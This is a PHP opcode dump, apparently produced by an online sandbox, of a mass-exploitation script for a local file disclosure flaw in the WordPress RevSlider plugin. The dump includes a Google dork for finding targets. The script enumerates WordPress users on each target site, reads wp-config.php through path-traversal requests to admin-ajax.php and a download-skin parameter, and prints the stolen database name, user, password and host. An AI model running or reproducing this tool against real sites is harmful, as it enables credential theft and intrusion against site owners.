Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 17, Position 2 = 297
Branch analysis from position: 17
2 jumps found. (Code = 78) Position 1 = 18, Position 2 = 297
Branch analysis from position: 18
2 jumps found. (Code = 43) Position 1 = 63, Position 2 = 76
Branch analysis from position: 63
2 jumps found. (Code = 43) Position 1 = 145, Position 2 = 185
Branch analysis from position: 145
2 jumps found. (Code = 77) Position 1 = 187, Position 2 = 295
Branch analysis from position: 187
2 jumps found. (Code = 78) Position 1 = 188, Position 2 = 295
Branch analysis from position: 188
2 jumps found. (Code = 43) Position 1 = 247, Position 2 = 294
Branch analysis from position: 247
1 jumps found. (Code = 42) Position 1 = 295
Branch analysis from position: 295
1 jumps found. (Code = 42) Position 1 = 17
Branch analysis from position: 17
Branch analysis from position: 294
1 jumps found. (Code = 42) Position 1 = 187
Branch analysis from position: 187
Branch analysis from position: 295
Branch analysis from position: 295
Branch analysis from position: 185
Branch analysis from position: 76
Branch analysis from position: 297
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 297
filename: /in/K4M4q
function name: (null)
number of ops: 300
compiled vars: !0 = $sites, !1 = $site, !2 = $ch, !3 = $get, !4 = $version, !5 = $str, !6 = $users, !7 = $user, !8 = $wpuser, !9 = $xp, !10 = $DB_NAME, !11 = $DB_USER, !12 = $DB_PASSWORD, !13 = $DB_HOST, !14 = $lt, !15 = $l, !16 = $process, !17 = $return
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
1 0 E > ECHO '%23+Exploit+Title%3A+%5BWordpress+RevSlider+Plugin+LFD%5D%0A%23+Google+Dork%3A+inurl%3A%2Fadmin-ajax.php%3Faction%3Drevslider_show_image%0A%23+Date%3A+12%2F29%2F14%0A%23+Exploit+Author%3A+FarbodEZRaeL%0A%23+Vendor+Homepage%3A+iranhack.org%0A%23+Software+Link%3A+wordpress.org%0A%23+Tested+on%3A+windows%0A%23Exploit%3A%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3EExploits+Wordpress%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+style%3D%22background-color%3A+rebeccapurple%3B%22%3E%0A%0A%3Cpre%3E%3Cp%3E%3Ccenter+style%3D%22color%3A+aqua%3B%22%3E%0A%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%3D+++++++Exploits+Wordpress+RevSlider+Plugin+LFD+Vuln++++++++%3D%0A%3D+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%3D%0A%3D++++++++++++++++++++Coded+by+FarbodEZRaeL++++++++++++++++++%3D%0A%3D++++++++++++++++++++Iranhack+Security+team+++++++++++++++++%3D%0A%3D+++++++++++++++++++++++www.iranhack.org++++++++++++++++++++%3D%0A%3D+++++++++++++++++++++Fix+bug+Other+Version+++++++++++++++++%3D%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%3Cpre%3E%3Chref%3E%0A%3Cform+method%3D%27POST%27%3E%0A%3Ctextarea+name%3D%27sites%27+cols%3D%2745%27+rows%3D%270%27%3E%3C%2Ftextarea%3E%0A%3Cbr%3E%0A%3Cinput+type%3D%27submit%27+value%3D%27Exploit%27+%2F%3E%0A%3C%2Fform%3E%0A%0A'
37 1 BEGIN_SILENCE ~18
2 INIT_FCALL 'set_time_limit'
3 SEND_VAL 0
4 DO_ICALL
5 END_SILENCE ~18
38 6 INIT_FCALL 'error_reporting'
7 SEND_VAL 0
8 DO_ICALL
39 9 INIT_FCALL 'explode'
10 SEND_VAL '%0D%0A'
11 FETCH_R global ~21 '_POST'
12 FETCH_DIM_R ~22 ~21, 'sites'
13 SEND_VAL ~22
14 DO_ICALL $23
15 ASSIGN !0, $23
41 16 > FE_RESET_R $25 !0, ->297
17 > > FE_FETCH_R $25, !1, ->297
43 18 > INIT_FCALL 'trim'
19 SEND_VAR !1
20 DO_ICALL $26
21 ASSIGN !1, $26
45 22 INIT_FCALL_BY_NAME 'curl_init'
23 DO_FCALL 0 $28
24 ASSIGN !2, $28
46 25 INIT_FCALL_BY_NAME 'curl_setopt'
26 SEND_VAR_EX !2
27 FETCH_CONSTANT ~30 'CURLOPT_URL'
28 SEND_VAL_EX ~30
29 CAST 6 ~31 !1
30 SEND_VAL_EX ~31
31 DO_FCALL 0
47 32 INIT_FCALL_BY_NAME 'curl_setopt'
33 SEND_VAR_EX !2
34 FETCH_CONSTANT ~33 'CURLOPT_HEADER'
35 SEND_VAL_EX ~33
36 SEND_VAL_EX 1
37 DO_FCALL 0
48 38 INIT_FCALL_BY_NAME 'curl_setopt'
39 SEND_VAR_EX !2
40 FETCH_CONSTANT ~35 'CURLOPT_RETURNTRANSFER'
41 SEND_VAL_EX ~35
42 SEND_VAL_EX 1
43 DO_FCALL 0
49 44 INIT_FCALL_BY_NAME 'curl_setopt'
45 SEND_VAR_EX !2
46 FETCH_CONSTANT ~37 'CURLOPT_USERAGENT'
47 SEND_VAL_EX ~37
48 SEND_VAL_EX 'Mozilla%2F4.0+%28compatible%3B+MSIE+6.0%3B%0AWindows+NT+5.0%29'
49 DO_FCALL 0
51 50 INIT_FCALL_BY_NAME 'curl_exec'
51 SEND_VAR_EX !2
52 DO_FCALL 0 $39
53 ASSIGN !3, $39
52 54 INIT_FCALL_BY_NAME 'curl_close'
55 SEND_VAR_EX !2
56 DO_FCALL 0
53 57 INIT_FCALL 'preg_match'
58 SEND_VAL '%23WordPress+%28.%2A%3F%29%2F%3E%23'
59 SEND_VAR !3
60 SEND_REF !4
61 DO_ICALL $42
62 > JMPZ $42, ->76
54 63 > INIT_FCALL 'str_replace'
64 SEND_VAL '%2F%3E'
65 SEND_VAL ''
66 FETCH_DIM_R ~43 !4, 0
67 SEND_VAL ~43
68 DO_ICALL $44
69 ASSIGN !5, $44
55 70 INIT_FCALL 'str_replace'
71 SEND_VAL '%22'
72 SEND_VAL ''
73 SEND_VAR !5
74 DO_ICALL $46
75 ASSIGN !5, $46
57 76 > BEGIN_SILENCE ~48
77 INIT_FCALL 'file_get_contents'
78 NOP
79 FAST_CONCAT ~49 !1, '%2F%3Fauthor%3D1'
80 SEND_VAL ~49
81 DO_ICALL $50
82 END_SILENCE ~48
83 ASSIGN !6, $50
58 84 INIT_FCALL 'preg_match'
85 SEND_VAL '%2F%3Ctitle%3E%3B%28.%2A%3F%29%3C%5C%2Ftitle%3E%2Fsi'
86 SEND_VAR !6
87 SEND_REF !7
88 DO_ICALL
59 89 INIT_FCALL 'explode'
90 SEND_VAL '%7C'
91 FETCH_DIM_R ~53 !7, 1
92 SEND_VAL ~53
93 DO_ICALL $54
94 ASSIGN !8, $54
60 95 ECHO '+%3Cbr%3E%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3C%2Fbr%3E'
61 96 CONCAT ~56 'Site+%3A+', !1
97 CONCAT ~57 ~56, '%3Cbr%3E+Wp+User+%3A+'
98 FETCH_DIM_R ~58 !8, 0
99 CONCAT ~59 ~57, ~58
100 CONCAT ~60 ~59, '%3Cbr%3E+Version+%3A%0A'
62 101 CONCAT ~61 ~60, !5
102 CONCAT ~62 ~61, '%3Cbr%3E'
103 ECHO ~62
63 104 INIT_FCALL_BY_NAME 'curl_init'
105 DO_FCALL 0 $63
106 ASSIGN !2, $63
64 107 INIT_FCALL_BY_NAME 'curl_setopt'
108 SEND_VAR_EX !2
109 FETCH_CONSTANT ~65 'CURLOPT_URL'
110 SEND_VAL_EX ~65
65 111 NOP
112 FAST_CONCAT ~66 !1, '%2Fwp-admin%2Fadmin-ajax.php%3Faction%3Drevslider_show_image%26img%3D..%2Fwp-config.php'
113 SEND_VAL_EX ~66
114 DO_FCALL 0
66 115 INIT_FCALL_BY_NAME 'curl_setopt'
116 SEND_VAR_EX !2
117 FETCH_CONSTANT ~68 'CURLOPT_HTTPGET'
118 SEND_VAL_EX ~68
119 SEND_VAL_EX 1
120 DO_FCALL 0
67 121 INIT_FCALL_BY_NAME 'curl_setopt'
122 SEND_VAR_EX !2
123 FETCH_CONSTANT ~70 'CURLOPT_RETURNTRANSFER'
124 SEND_VAL_EX ~70
125 SEND_VAL_EX 1
126 DO_FCALL 0
68 127 INIT_FCALL_BY_NAME 'curl_setopt'
128 SEND_VAR_EX !2
129 FETCH_CONSTANT ~72 'CURLOPT_USERAGENT'
130 SEND_VAL_EX ~72
131 SEND_VAL_EX 'Mozilla%2F4.0+%28compatible%3B+MSIE+5.01%3B%0AWindows+NT+5.0%29'
132 DO_FCALL 0
70 133 INIT_FCALL_BY_NAME 'curl_exec'
134 SEND_VAR_EX !2
135 DO_FCALL 0 $74
136 ASSIGN !9, $74
71 137 INIT_FCALL_BY_NAME 'curl_close'
138 SEND_VAR_EX !2
139 DO_FCALL 0
72 140 INIT_FCALL 'preg_match'
141 SEND_VAL '%23DB_USER%23i'
142 SEND_VAR !9
143 DO_ICALL $77
144 > JMPZ $77, ->185
73 145 > INIT_FCALL 'preg_match'
146 SEND_VAL '%23%27DB_NAME%27%2C+%27%28.%2A%3F%29%27%23i'
147 SEND_VAR !9
148 SEND_REF !10
149 DO_ICALL
74 150 ROPE_INIT 3 ~81 'DB_NAME%3A'
151 FETCH_DIM_R ~79 !10, 1
152 ROPE_ADD 1 ~81 ~81, ~79
153 ROPE_END 2 ~80 ~81, '%3Cbr%3E'
154 ECHO ~80
75 155 INIT_FCALL 'preg_match'
156 SEND_VAL '%23%27DB_USER%27%2C+%27%28.%2A%3F%29%27%23i'
157 SEND_VAR !9
158 SEND_REF !11
159 DO_ICALL
76 160 ROPE_INIT 3 ~86 'DB_USER%3A'
161 FETCH_DIM_R ~84 !11, 1
162 ROPE_ADD 1 ~86 ~86, ~84
163 ROPE_END 2 ~85 ~86, '%3Cbr%3E'
164 ECHO ~85
77 165 INIT_FCALL 'preg_match'
166 SEND_VAL '%23%27DB_PASSWORD%27%2C+%27%28.%2A%3F%29%27%23i'
167 SEND_VAR !9
168 SEND_REF !12
169 DO_ICALL
78 170 ROPE_INIT 3 ~91 'DB_PASSWORD%3A'
171 FETCH_DIM_R ~89 !12, 1
172 ROPE_ADD 1 ~91 ~91, ~89
173 ROPE_END 2 ~90 ~91, '%3Cbr%3E'
174 ECHO ~90
79 175 INIT_FCALL 'preg_match'
176 SEND_VAL '%23%27DB_HOST%27%2C+%27%28.%2A%3F%29%27%23i'
177 SEND_VAR !9
178 SEND_REF !13
179 DO_ICALL
80 180 ROPE_INIT 3 ~96 'DB_HOST%3A'
181 FETCH_DIM_R ~94 !13, 1
182 ROPE_ADD 1 ~96 ~96, ~94
183 ROPE_END 2 ~95 ~96, '%3Cbr%3E'
184 ECHO ~95
84 185 > ASSIGN !14, <array>
86 186 > FE_RESET_R $99 !14, ->295
187 > > FE_FETCH_R $99, !15, ->295
87 188 > ROPE_INIT 3 ~101 !1
189 ROPE_ADD 1 ~101 ~101, '%2F'
190 ROPE_END 2 ~100 ~101, !15
191 ASSIGN !1, ~100
88 192 INIT_FCALL_BY_NAME 'curl_init'
193 SEND_VAR_EX !1
194 DO_FCALL 0 $104
195 ASSIGN !16, $104
89 196 INIT_FCALL_BY_NAME 'curl_setopt'
197 SEND_VAR_EX !16
198 FETCH_CONSTANT ~106 'CURLOPT_TIMEOUT'
199 SEND_VAL_EX ~106
200 SEND_VAL_EX 30
201 DO_FCALL 0
90 202 INIT_FCALL_BY_NAME 'curl_setopt'
203 SEND_VAR_EX !16
204 FETCH_CONSTANT ~108 'CURLOPT_USERAGENT'
205 SEND_VAL_EX ~108
206 SEND_VAL_EX 'Mozilla%2F4.0+%28compatible%3B+MSIE%0A7.0%3B+Windows+NT+6.0%29'
207 DO_FCALL 0
92 208 INIT_FCALL_BY_NAME 'curl_setopt'
209 SEND_VAR_EX !16
210 FETCH_CONSTANT ~110 'CURLOPT_HEADER'
211 SEND_VAL_EX ~110
212 SEND_VAL_EX <true>
213 DO_FCALL 0
93 214 INIT_FCALL_BY_NAME 'curl_setopt'
215 SEND_VAR_EX !16
216 FETCH_CONSTANT ~112 'CURLOPT_POST'
217 SEND_VAL_EX ~112
218 SEND_VAL_EX 1
219 DO_FCALL 0
94 220 INIT_FCALL_BY_NAME 'curl_setopt'
221 SEND_VAR_EX !16
222 FETCH_CONSTANT ~114 'CURLOPT_POSTFIELDS'
223 SEND_VAL_EX ~114
95 224 SEND_VAL_EX '_mysite_download_skin%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php'
225 DO_FCALL 0
96 226 INIT_FCALL_BY_NAME 'curl_setopt'
227 SEND_VAR_EX !16
228 FETCH_CONSTANT ~116 'CURLOPT_RETURNTRANSFER'
229 SEND_VAL_EX ~116
230 SEND_VAL_EX 1
231 DO_FCALL 0
97 232 INIT_FCALL_BY_NAME 'curl_setopt'
233 SEND_VAR_EX !16
234 FETCH_CONSTANT ~118 'CURLOPT_FOLLOWLOCATION'
235 SEND_VAL_EX ~118
236 SEND_VAL_EX 1
237 DO_FCALL 0
98 238 INIT_FCALL_BY_NAME 'curl_exec'
239 SEND_VAR_EX !16
240 DO_FCALL 0 $120
241 ASSIGN !17, $120
99 242 INIT_FCALL 'preg_match'
243 SEND_VAL '%23DB_USER%23i'
244 SEND_VAR !17
245 DO_ICALL $122
246 > JMPZ $122, ->294
100 247 > INIT_FCALL 'preg_match'
248 SEND_VAL '%23%27DB_NAME%27%2C+%27%28.%2A%3F%29%27%23i'
249 SEND_VAR !17
250 SEND_REF !10
251 DO_ICALL
101 252 ROPE_INIT 3 ~126 'DB_NAME%3A'
253 FETCH_DIM_R ~124 !10, 1
254 ROPE_ADD 1 ~126 ~126, ~124
255 ROPE_END 2 ~125 ~126, '%3Cbr%3E'
256 ECHO ~125
102 257 INIT_FCALL 'preg_match'
258 SEND_VAL '%23%27DB_USER%27%2C+%27%28.%2A%3F%29%27%23i'
259 SEND_VAR !17
260 SEND_REF !11
261 DO_ICALL
103 262 ROPE_INIT 3 ~131 'DB_USER%3A'
263 FETCH_DIM_R ~129 !11, 1
264 ROPE_ADD 1 ~131 ~131, ~129
265 ROPE_END 2 ~130 ~131, '%3Cbr%3E'
266 ECHO ~130
104 267 INIT_FCALL 'preg_match'
268 SEND_VAL '%23%27DB_PASSWORD%27%2C+%27%28.%2A%3F%29%27%23i'
269 SEND_VAR !17
270 SEND_REF !12
271 DO_ICALL
105 272 ROPE_INIT 3 ~136 'DB_PASSWORD%3A'
273 FETCH_DIM_R ~134 !12, 1
274 ROPE_ADD 1 ~136 ~136, ~134
275 ROPE_END 2 ~135 ~136, '%3Cbr%3E'
276 ECHO ~135
106 277 INIT_FCALL 'preg_match'
278 SEND_VAL '%23%27DB_HOST%27%2C+%27%28.%2A%3F%29%27%23i'
279 SEND_VAR !17
280 SEND_REF !13
281 DO_ICALL
107 282 ROPE_INIT 3 ~141 'DB_HOST%3A'
283 FETCH_DIM_R ~139 !13, 1
284 ROPE_ADD 1 ~141 ~141, ~139
285 ROPE_END 2 ~140 ~141, '%3Cbr%3E'
286 ECHO ~140
108 287 > JMP ->295
109 288* ECHO '+%3Cbr%3E-----------------------------------%3C%2Fbr%3E'
110 289* INIT_FCALL 'ob_implicit_flush'
290* SEND_VAL <true>
291* DO_ICALL
111 292* INIT_FCALL 'ob_end_flush'
293* DO_ICALL
86 294 > > JMP ->187
295 > FE_FREE $99
41 296 > JMP ->17
297 > FE_FREE $25
117 298 ECHO '%3C%2Fpre%3E%3C%2Fp%3E%3C%2Fcenter%3E'
299 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0